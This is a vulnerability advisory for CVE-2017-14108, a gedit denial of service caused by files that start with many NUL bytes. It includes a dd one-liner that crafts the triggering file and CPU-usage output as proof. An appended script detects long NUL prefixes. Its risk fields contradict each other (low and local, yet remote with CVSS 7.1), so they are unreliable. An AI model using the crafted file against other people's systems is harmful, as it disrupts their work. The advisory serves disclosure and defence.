libgedit.a mishandling NUL Blocks in gedit (GNOME text editor)

2017.09.02
Credit: Hosein Askari
Risk: Low
Local: Yes
Remote: No
CWE: CWE-400


CVSS Base Score: 7.1/10
Impact Subscore: 6.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: None
Integrity impact: None
Availability impact: Complete

################
#Title: libgedit.a mishandling NUL Blocks in gedit (GNOME text editor)
#CWE: CWE-400
#CVE: CVE-2017-14108
#Exploit Author: Hosein Askari
#Vendor HomePage: https://gnome.org , https://wiki.gnome.org/Apps/Gedit
#Version : All Version (3.22.1 and older version)
#Tested on: Ubuntu 16.04 (Linux 4.4.0-93-generic)
#Date: 01-09-2017
#Category: Application
#Author Mail : hosein.askari@aol.com
#Description: libgedit.a in GNOME gedit through 3.22.1 allows remote attackers to cause a denial of service (CPU consumption) via a file that begins with many '\0' characters.
###############
sudo echo -ne '\x68\x6f\x73\x65\x69\x6e\x20\x61\x73\x6b\x61\x72\x69' | dd conv=notrunc bs=1000 seek=100 of=craft.txt
################
POC:
constantine@constantine:~$ pidstat -h -r -u -v -p 3107
Linux 4.4.0-93-generic (constantine) ۱۷/۰۹/۰۱ _i686_ (2 CPU)
#      Time   UID   PID   %usr %system %guest  %wait   %CPU CPU minflt/s majflt/s    VSZ   RSS %MEM threads fd-nr Command
 1504280041  1000  3107  16.43    0.01   0.00   0.03 106.44   1    15.53     0.00 121296 38804 0.95       4    18 gedit
constantine@constantine:~$ top
 PID USER     PR NI   VIRT   RES   SHR S  %CPU %MEM   TIME+ COMMAND
3107 constan+ 20  0 128884 38492 28320 R 106.7  0.9 0:17.76 gedit
################
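A defensive pre-open check for the condition the description names (a file that begins with many '\0' characters), added here as an example and not part of the original advisory. The function names and the 4096-byte default threshold are assumptions, and the sample file is constructed.

```shell
#!/bin/sh
# Added example (not from the advisory): measure the run of NUL bytes at the
# start of a file so it can be triaged before being opened in gedit.

# Print the number of consecutive 0x00 bytes at the start of file $1.
leading_nuls() {
    f=$1
    [ -f "$f" ] && [ -r "$f" ] || return 2
    size=$(wc -c < "$f")
    # cmp -l prints "offset octal octal" for every differing byte, with
    # 1-based offsets. Compared against /dev/zero, the first offset listed
    # is the first non-NUL byte. awk exits after one line, so a large file
    # is not scanned to the end.
    first=$({ cmp -l "$f" /dev/zero 2>/dev/null || true; } |
            awk 'NR == 1 { print $1; exit }')
    if [ -n "$first" ]; then
        echo $((first - 1))
    else
        echo $((size))      # empty file, or nothing but NUL bytes
    fi
}

# Return 0 (flag the file) when the NUL prefix is at least $2 bytes long.
# The default of 4096 is an assumed threshold, not a value from the advisory.
nul_prefix_flagged() {
    n=$(leading_nuls "$1") || return 2
    [ "$n" -ge "${2:-4096}" ]
}

# Constructed sample input: $2 NUL bytes followed by one line of text.
make_sample() {
    { dd if=/dev/zero bs=1 count="$2" 2>/dev/null; printf 'plain text\n'; } > "$1"
}
```

`nul_prefix_flagged FILE && echo "hold FILE for review"` can run in a mail or download filter; a file made of nothing but NUL bytes is reported with its full size as the prefix length.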



Copyright 2017, cxsecurity.com

 
